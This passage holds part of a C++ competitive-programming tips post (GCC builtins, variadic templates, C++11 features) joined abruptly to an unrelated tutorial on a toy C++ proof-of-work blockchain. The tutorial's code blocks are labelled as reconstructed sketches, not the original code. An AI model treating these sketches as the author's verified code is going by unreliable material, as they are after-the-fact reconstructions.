This function returns 1 + least significant 1-bit of x. If x == 0, returns 0. Here x is int, this function with suffix ‘l’ gets a long argument and with suffix ‘ll’ gets a long long argument.

e.g. __builtin_ffs(10) = 2, because 10 is '...1010' in base 2 and the first 1-bit from the right is at index 1 (0-based), and the function returns 1 + index.

three)

__builtin_clz(x)

This function returns the number of leading 0-bits of x, starting from the most significant bit position. x is unsigned int, and like the previous function, with suffix ‘l’ it takes an unsigned long argument and with suffix ‘ll’ an unsigned long long argument. If x == 0, the result is undefined.

e.g. __builtin_clz(16) = 27 because 16 is '10000'. The number of bits in an unsigned int is 32, so the function returns 32 - 5 = 27.

four)

__builtin_ctz(x)

This function returns the number of trailing 0-bits of x, starting from the least significant bit position. x is unsigned int, and like the previous function, with suffix ‘l’ it takes an unsigned long argument and with suffix ‘ll’ an unsigned long long argument. If x == 0, the result is undefined.

e.g. __builtin_ctz(16) = 4 because 16 is '...10000'. The number of trailing 0-bits is 4.

five)

__builtin_popcount(x)

This function returns the number of 1-bits of x. x is unsigned int, and like the previous function, with suffix ‘l’ it takes an unsigned long argument and with suffix ‘ll’ an unsigned long long argument. (For x == 0 it simply returns 0.)

e.g. __builtin_popcount(14) = 3 because 14 is '...1110' and has three 1-bits.

Note: There are other __builtin functions too, but they are not as useful as these ones.

Note: I won’t cover the other functions here, but if you are interested in working with them, I suggest this website.

5. Variadic Functions and Macros

We can have a variadic function. I want to write a sum function which gets a number of ints, and returns sum of them. Look at the code below:

int sum() { return 0; }

template<typename... Args>
int sum(int a, Args... args) { return a + sum(args...); }

int main() { cout << sum(5, 7, 2, 2) + sum(3, 4); /* prints "23" */ }

In the code above I used a template. sum(5, 7, 2, 2) becomes 5 + sum(7, 2, 2) then sum(7, 2, 2), itself, becomes 7 + sum(2, 2) and so on… I also declare another sum function which gets 0 arguments and returns 0.

I can even define an any-type sum function:

int sum() { return 0; }

template<typename T, typename... Args>
T sum(T a, Args... args) { return a + sum(args...); }

int main() { cout << sum(5, 7, 2, 2) + sum(3.14, 4.89); /* prints "24.03" */ }

Here, I just changed int to T and added typename T to my template.

In C++14 you can also use auto sum(T a, Args... args) in order to get sum of mixed types. (Thanks to slycelote and Corei13)

We can also use variadic macros:

#define a_macro(args...) sum(args...)

int sum() { return 0; }

template<typename T, typename... Args>
auto sum(T a, Args... args) { return a + sum(args...); }

int main() { cout << a_macro(5, 7, 2, 2) + a_macro(3.14, 4.89); /* prints "24.03" */ }

Using these 2, we can have a great debugging function: (thanks to Igorjan94) — Updated!

#include <bits/stdc++.h>

using namespace std;

#define error(args...) { string _s = #args; replace(_s.begin(), _s.end(), ',', ' '); stringstream _ss(_s); istream_iterator<string> _it(_ss); err(_it, args); }

void err(istream_iterator<string> it) {}
template<typename T, typename... Args>
void err(istream_iterator<string> it, T a, Args... args) {
	cerr << *it << " = " << a << endl;
	err(++it, args...);
}

int main() {
	int a = 4, b = 8, c = 9;
	error(a, b, c);
}

Output:

a = 4
b = 8
c = 9

This function helps a lot in debugging.

6. Here is C++0x in CF, why still C++?

Variadic functions also belong to C++11 (a.k.a. C++0x). In this section I want to show you some more great features of C++11.

one) Range-based For-loop

Here is a piece of an old code:

set<int> s = {8, 2, 3, 1};
for (set<int>::iterator it = s.begin(); it != s.end(); ++it)
    cout << *it << ' ';
// prints "1 2 3 8"

Trust me, that’s a lot of code for such a simple loop; just use this:

set<int> s = {8, 2, 3, 1};
for (auto it: s)
    cout << it << ' ';
// prints "1 2 3 8"

We can also change the values; just replace auto with auto &:

vector<int> v = {8, 2, 3, 1};
for (auto &it: v)
    it *= 2;
for (auto it: v)
    cout << it << ' ';
// prints "16 4 6 2"

two) The Power of auto

You don’t need to write out the type you want to use; C++11 can infer it for you. If you need to loop over the iterators of a set<pair<int, pair<int, int> > > from begin to end, typing set<pair<int, pair<int, int> > >::iterator is real suffering! Just use auto it = s.begin().

Also, x.begin() and x.end() are now accessible as begin(x) and end(x).

There are more features; I think I’ve mentioned the most useful ones. Maybe I’ll add something else to the post later. If you know anything useful, please share it with the Codeforces community 🙂

From Ximera‘s comment:

this code:

for(i = 1; i <= n; i++) {
    for(j = 1; j <= m; j++)
        cout << a[i][j] << " ";
    cout << "\n";
}

is equivalent to this:

for(i = 1; i <= n; i++)
    for(j = 1; j <= m; j++)
        cout << a[i][j] << " \n"[j == m];

And here is the reason: " \n" is a char*, so " \n"[0] is ' ' and " \n"[1] is '\n'.

From technetium28‘s comment:

Usage of tie and emplace_back:

#define mt make_tuple
#define eb emplace_back
typedef tuple<int,int,int> State; // operator< defined

int main(){
  int a,b,c;
  tie(a,b,c) = mt(1,2,3); // assign
  tie(a,b) = mt(b,a); // swap(a,b)

  vector<pair<int,int>> v;
  v.eb(a,b); // shorter and faster than pb(mp(a,b))

  // Dijkstra
  priority_queue<State> q;
  q.emplace(0, src, -1); // src is the source node, declared elsewhere
  while(q.size()){
    int dist, node, prev;
    tie(dist, node, prev) = q.top(); q.pop();
    dist = -dist;
    // ~~ find next state ~~
    q.emplace(-new_dist, new_node, node);
  }
}

And that’s why emplace_back is faster: it constructs the value in place at the end of the vector, whereas push_back constructs it somewhere else and then moves it into the vector.

Also in the code above you can see how tie(args...) works. You can also use ignore keyword in tie to ignore a value:

tuple<int, int, int, char> t (3, 4, 5, 'g');
int a, b;
tie(b, ignore, a, ignore) = t;
cout << a << ' ' << b << '\n';

Output: 5 3

I use this macro and I love it:

#define rep(i, begin, end) for (__typeof(end) i = (begin) - ((begin) > (end)); i != (end) - ((begin) > (end)); i += 1 - 2 * ((begin) > (end)))

First of all, you don’t need to name the type you want to use. Second, it goes forwards or backwards based on the (begin > end) condition, e.g. rep(i, 1, 10) is 1, 2, …, 8, 9 and rep(i, 10, 1) is 9, 8, …, 2, 1

It works well with different types e.g.

vector<int> v = {4, 5, 6, 4, 8};
rep(it, end(v), begin(v))
    cout << *it << ' ';
// prints "8 4 6 5 4"

Also there is another great feature of C++11, lambda functions!

Lambdas are like closures in other languages. A lambda is defined like this:

[capture list](parameters) -> return value { body }

one) Capture List: simple! We don’t need it here, so just put []

two) parameters: simple! e.g. int x, string s

three) return value: simple again! e.g. pair<int, int>, which can be omitted most of the time (thanks to Jacob)

four) body: contains function bodies, and returns return value.

e.g.

auto f = [] (int a, int b) -> int { return a + b; };
cout << f(1, 2); // prints "3"

You can use lambdas in for_each, sort and many more STL functions:

vector<int> v = {3, 1, 2, 1, 8};
sort(begin(v), end(v), [] (int a, int b) { return a > b; });
for (auto i: v) cout << i << ' ';

Output:

8 3 2 1 1

From Igorjan94‘s comment:

Usage of move:

When you work with STL containers like vector, you can use move function to just move container, not to copy it all.

vector<int> v = {1, 2, 3, 4};
vector<int> w = move(v);

cout << "v: ";
for (auto i: v)
    cout << i << ' ';

cout << "\nw: ";
for (auto i: w)
    cout << i << ' ';

Output:

v: 
w: 1 2 3 4 

As you can see, v was moved into w rather than copied. (After the move, v is left in a valid but unspecified state; in practice it is empty, as the output shows.)

7. C++0x Strings

one) Raw Strings (From IvayloS‘s comment)

You can have UTF-8 strings, raw strings and more. Here I want to show raw strings. We define a raw string as below:

string s = R"(Hello, World!)"; // Stored: "Hello, World!"

A raw string ignores escape sequences like \n or \". e.g.

string str = "Hello\tWorld\n";
string r_str = R"(Hello\tWorld\n)";
cout << str << r_str;

Output:

Hello	World
Hello\tWorld\n

You can also have a multi-line raw string:

string r_str =
R"(Dear Programmers,
I'm using C++11
Regards, Swift!)";
cout << r_str;

Output:

Dear Programmers,
I'm using C++11
Regards, Swift!

two) Regular Expressions (regex)

Regular expressions are useful tools in programming; we can define a regular expression with regex, e.g. regex r = "[a-z]+";. We will use raw strings for them, because regexes often contain \ and other special characters. Look at the example:

regex email_pattern(R"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"); // This email pattern is not totally correct! It's correct for most emails.

string
valid_email("swift@codeforces.com"),
invalid_email("hello world");

if (regex_match(valid_email, email_pattern))
    cout << valid_email << " is valid\n";
else
    cout << valid_email << " is invalid\n";

if (regex_match(invalid_email, email_pattern))
    cout << invalid_email << " is valid\n";
else
    cout << invalid_email << " is invalid\n";

Output:

swift@codeforces.com is valid
hello world is invalid

Note: You can learn regex on this website.

three) User-defined literals

You already know literals from C++, like 0xA, 1000ll, 3.14f, and so on…

Now you can have your own custom literals! Sounds great 🙂 So let’s see an example:

long long operator "" _m(unsigned long long literal) {
	return literal;
}

long double operator "" _cm(unsigned long long literal) {
	return literal / 100.0;
}

long long operator "" _km(unsigned long long literal) {
	return literal * 1000;
}

int main() {
	// See results in meter:
	cout << 250_m << " meters \n"; // Prints 250 meters
	cout << 12_km << " meters \n"; // Prints 12000 meters
	cout << 421_cm << " meters \n"; // Prints 4.21 meters
}

Note that a user-defined literal suffix should start with an underscore (_). We declare a new literal by this pattern:

[returnType] operator "" _[name]([parameters]) { [body] }

Note that the parameter list can only be one of these:

(const char *)

(unsigned long long int)

(long double)

(char)

(wchar_t)

(char16_t)

(char32_t)

(const char *, size_t)

(const wchar_t *, size_t)

(const char16_t *, size_t)

(const char32_t *, size_t)

Literals can also be used with templates.

Build a blockchain with C++

So, you might have heard a lot about something called a blockchain lately and wondered what all the fuss is about. A blockchain is a ledger which has been written in such a way that updating the data contained within it becomes very difficult; some say the blockchain is immutable, and to all intents and purposes they’re right, but immutability suggests permanence and nothing on a hard drive could ever be considered permanent. Anyway, we’ll leave the philosophical debate to the non-techies; you’re looking for someone to show you how to write a blockchain in C++, so that’s exactly what I’m going to do.

Before I go any further, I have a couple of disclaimers:

  1. This tutorial is based on one written by Savjee using NodeJS; and
  2. It’s been a while since I wrote any C++ code, so I might be a little rusty.

The first thing you’ll want to do is open a new C++ project; I’m using CLion from JetBrains, but any C++ IDE or even a text editor will do. For the purposes of this tutorial we’ll call the project TestChain, so go ahead and create the project and we’ll get started.

If you’re using CLion you’ll see that the main.cpp file will have already been created and opened for you; we’ll leave this to one side for the time being.

Create a file called Block.h in the main project folder; you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Header File.

Inside the file, add the following code (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCK_H and #endif):
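
As a sketch matching the description below:

#include <cstdint>
#include <iostream>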

These lines above tell the compiler to include the cstdint and iostream libraries.

Add this line below it:
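
Based on the explanation that follows, that line is:

using namespace std;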

This essentially creates a shortcut to the std namespace, which means that we don’t need to refer to declarations inside the std namespace by their full names, e.g. std::string, but can instead use their shortened names, e.g. string.

So far, so good; let’s start fleshing things out a little more.

A blockchain is made up of a series of blocks which contain data, and each block contains a cryptographic representation of the previous block, which means that it becomes very hard to change the contents of any block without then needing to change every subsequent one; this is where the blockchain essentially gets its immutable properties.

So let’s create our block class, add the following lines to the Block.h header file:
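
Here is a sketch of the class, laid out so that the line numbers in the walkthrough below match up (the exact types are my best reading of the description):

class Block {
public:
    string sPrevHash;

    Block(uint32_t nIndexIn, const string &sDataIn);

    string GetHash();

    void MineBlock(uint32_t nDifficulty);

private:
    uint32_t _nIndex;
    int64_t _nNonce;
    string _sData;
    string _sHash;
    time_t _tTime;

    string _CalculateHash() const;
};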

Unsurprisingly, we’re calling our class Block (line 1), followed by the public modifier (line 2) and the public variable sPrevHash (remember each block is linked to the previous block) (line 3). The constructor signature (line 5) takes two parameters, nIndexIn and sDataIn; note that the const keyword is used along with the reference modifier (&) so that the parameters are passed by reference but cannot be changed; this is done to improve efficiency and save memory. The GetHash method signature is specified next (line 7), followed by the MineBlock method signature (line 9), which takes a parameter nDifficulty. We specify the private modifier (line 11) followed by the private variables _nIndex, _nNonce, _sData, _sHash, and _tTime (lines 12–16). The signature for _CalculateHash (line 18) also has the const keyword; this ensures the method cannot modify the object’s state, which is very useful when dealing with a blockchain.

Now it’s time to create our Blockchain.h header file in the main project folder.

Let’s start by adding these lines (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCKCHAIN_H and #endif):
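
A sketch of those lines:

#include <cstdint>
#include <vector>

#include "Block.h"

using namespace std;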

They tell the compiler to include the cstdint and vector libraries, as well as the Block.h header file we have just created, and create a shortcut to the std namespace.

Now let’s create our blockchain class, add the following lines to the Blockchain.h header file:
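
Again as a sketch, laid out to match the line numbers referenced below:

class Blockchain {
public:
    Blockchain();

    void AddBlock(Block bNew);

private:
    uint32_t _nDifficulty;
    vector<Block> _vChain;

    Block _GetLastBlock() const;
};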

As with our block class, we’re keeping things simple and calling our blockchain class Blockchain (line 1), followed by the public modifier (line 2) and the constructor signature (line 3). The AddBlock signature (line 5) takes a parameter bNew, which must be an object of the Block class we created earlier. We then specify the private modifier (line 7), followed by the private variables _nDifficulty and _vChain (lines 8–9), as well as the method signature for _GetLastBlock (line 11), which is also followed by the const keyword to denote that the method cannot modify the object.

Since blockchains use cryptography, now would be a good time to get some cryptographic functionality into our blockchain. We’re going to be using the SHA256 hashing technique to create hashes of our blocks; we could write our own but really, in this day and age of open source software, why bother?

To make my life that much easier, I copied and pasted the text for the sha256.h, sha256.cpp and LICENSE.txt files shown on the C++ sha256 function from Zedwood and saved them in the project folder.

Right, let’s keep going.

Create a source file for our block and save it as Block.cpp in the main project folder; you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Source File.

Start by adding these lines, which tell the compiler to include the Block.h and sha256.h files we added earlier.
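
A sketch of those lines; I’ve also pulled in <ctime> and <sstream> here, since the implementation below uses time() and stringstream (an assumption on my part, they may arrive transitively):

#include <ctime>   // for time(), used in the constructor (assumed)
#include <sstream> // for stringstream, used in _CalculateHash (assumed)

#include "Block.h"
#include "sha256.h"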

Follow these with the implementation of our block constructor:
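
A sketch, matching the line-by-line description below:

Block::Block(uint32_t nIndexIn, const string &sDataIn) : _nIndex(nIndexIn), _sData(sDataIn) {
    _nNonce = -1;
    _tTime = time(nullptr);
}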

The constructor starts off by repeating the signature we specified in the Block.h header file (line 1), but we also add code to copy the contents of the parameters into the variables _nIndex and _sData. The _nNonce variable is set to -1 (line 2) and the _tTime variable is set to the current time (line 3).

Let’s add an accessor for the block’s hash:
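
For example:

string Block::GetHash() {
    return _sHash;
}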

We specify the signature for GetHash (line 1) and then add a return for the private variable _sHash (line 2).

As you might have read, blockchain technology was made popular when it was devised for the Bitcoin digital currency, as the ledger is both immutable and public; which means that, as one user transfers Bitcoin to another user, a transaction for the transfer is written into a block on the blockchain by nodes on the Bitcoin network. A node is another computer which is running the Bitcoin software and, since the network is peer-to-peer, it could be anyone around the world; this process is called ‘mining’ as the owner of the node is rewarded with Bitcoin each time they successfully create a valid block on the blockchain.

To successfully create a valid block, and therefore be rewarded, a miner must create a cryptographic hash of the block they want to add to the blockchain that matches the requirements for a valid hash at that time; this is achieved by counting the number of zeros at the beginning of the hash: if the number of zeros is equal to or greater than the difficulty level set by the network, the block is valid. If the hash is not valid, a variable called a nonce is incremented and the hash is created again; this process, called Proof of Work (PoW), is repeated until a hash is produced that is valid.

So, with that being said, let’s add the MineBlock method; here’s where the magic happens!
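
A sketch, laid out to match the line numbers referenced below (note that the variable-length array is a GCC/Clang extension rather than standard C++):

void Block::MineBlock(uint32_t nDifficulty) {
    char cstr[nDifficulty + 1];
    for (uint32_t i = 0; i < nDifficulty; ++i) {
        cstr[i] = '0';
    }
    cstr[nDifficulty] = '\0';

    string str(cstr);

    do {
        _nNonce++;
        _sHash = _CalculateHash();
    } while (_sHash.substr(0, nDifficulty) != str);

    cout << "Block mined: " << _sHash << endl;
}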

We start with the signature for the MineBlock method, which we specified in the Block.h header file (line 1), and create an array of characters with a length one greater than the value specified for nDifficulty (line 2). A for loop is used to fill the array with zeros, followed by the final array item being given the string terminator character (\0) (lines 3–6); then the character array, or C string, is turned into a standard string (line 8). A do…while loop is then used (lines 10–13): the _nNonce is incremented and _sHash is assigned the output of _CalculateHash, and the front portion of the hash is compared with the string of zeros we’ve just created; if no match is found the loop is repeated until a match is found. Once a match is found, a message is sent to the output buffer to say that the block has been successfully mined (line 15).

We’ve seen it mentioned a few times before, so let’s now add the _CalculateHash method:
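
A sketch matching the description below:

inline string Block::_CalculateHash() const {
    stringstream ss;
    ss << _nIndex << _tTime << _sData << _nNonce << sPrevHash;

    return sha256(ss.str());
}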

We kick off with the signature for the _CalculateHash method (line 1), which we specified in the Block.h header file, but we include the inline keyword which makes the code more efficient as the compiler places the method’s instructions inline wherever the method is called; this cuts down on separate method calls. A string stream is then created (line 2), followed by appending the values for _nIndex, _tTime, _sData, _nNonce, and sPrevHash to the stream (line 3). We finish off by returning the output of the sha256 method (from the sha256 files we added earlier) using the string output from the string stream (line 5).

Right, let’s finish off our blockchain implementation! Same as before, create a source file for our blockchain and save it as Blockchain.cpp in the main project folder.

Add these lines, which tell the compiler to include the Blockchain.h file we added earlier.
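
Namely:

#include "Blockchain.h"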

Follow these with the implementation of our blockchain constructor:
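
A sketch; the difficulty value is my own placeholder, tune it to taste:

Blockchain::Blockchain() {
    _vChain.emplace_back(Block(0, "Genesis Block"));
    _nDifficulty = 6; // placeholder difficulty; higher means slower mining
}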

We start off with the signature for the blockchain constructor we specified in Blockchain.h (line 1). As blocks are added to the blockchain they need to reference the previous block using its hash, but as the blockchain must start somewhere, we have to create a block for the next block to reference; we call this a genesis block. A genesis block is created and placed onto the _vChain vector (line 2). We then set the _nDifficulty level (line 3) depending on how hard we want to make the PoW process.

Now it’s time to add the code for adding a block to the blockchain, add the following lines:
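
A sketch matching the description below:

void Blockchain::AddBlock(Block bNew) {
    bNew.sPrevHash = _GetLastBlock().GetHash();
    bNew.MineBlock(_nDifficulty);
    _vChain.push_back(bNew);
}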

The signature we specified in Blockchain.h for AddBlock is added (line 1) followed by setting the sPrevHash variable for the new block from the hash of the last block on the blockchain which we get using _GetLastBlock and its GetHash method (line 2). The block is then mined using the MineBlock method (line 3) followed by the block being added to the _vChain vector (line 4), thus completing the process of adding a block to the blockchain.

Let’s finish this file off by adding the last method:
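
For example:

Block Blockchain::_GetLastBlock() const {
    return _vChain.back();
}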

We add the signature for _GetLastBlock from Blockchain.h (line 1), followed by returning the last block found in the _vChain vector using its back method (line 2).

Right, that’s almost it, let’s test it out!

Remember the main.cpp file? Now’s the time to update it, open it up and replace the contents with the following lines:
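
Namely:

#include "Blockchain.h"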

This tells the compiler to include the Blockchain.h file we created earlier.

Then add the following lines:
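
A sketch; the block data strings are placeholders:

int main() {
    Blockchain bChain = Blockchain();

    cout << "Mining block 1..." << endl;
    bChain.AddBlock(Block(1, "Block 1 Data"));

    cout << "Mining block 2..." << endl;
    bChain.AddBlock(Block(2, "Block 2 Data"));

    cout << "Mining block 3..." << endl;
    bChain.AddBlock(Block(3, "Block 3 Data"));

    return 0;
}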

As with most C/C++ programs, everything is kicked off by calling the main method. This one creates a new blockchain (line 2), informs the user that a block is being mined by printing to the output buffer (line 4), then creates a new block and adds it to the chain (line 5); the process for mining that block will then kick off until a valid hash is found. Once the block is mined, the process is repeated for two more blocks.

Time to run it! If you are using CLion simply hit the ‘Run TestChain’ button in the top right hand corner of the window. If you’re old skool, you can compile and run the program using the following commands from the command line:
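
For example, assuming g++ and the file names used above:

g++ -std=c++11 -o TestChain main.cpp Block.cpp Blockchain.cpp sha256.cpp
./TestChain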

If all goes well you should see an output like this:
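
Something like this, with the hashes elided (yours will differ):

Mining block 1...
Block mined: 000000…
Mining block 2...
Block mined: 000000…
Mining block 3...
Block mined: 000000…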

Congratulations, you have just written a blockchain from scratch in C++. In case you got lost, I’ve put all the files into a GitHub repo. Since the original code for Bitcoin was also written in C++, why not take a look at its code and see what improvements you can make to what we’ve started off today?

Orig post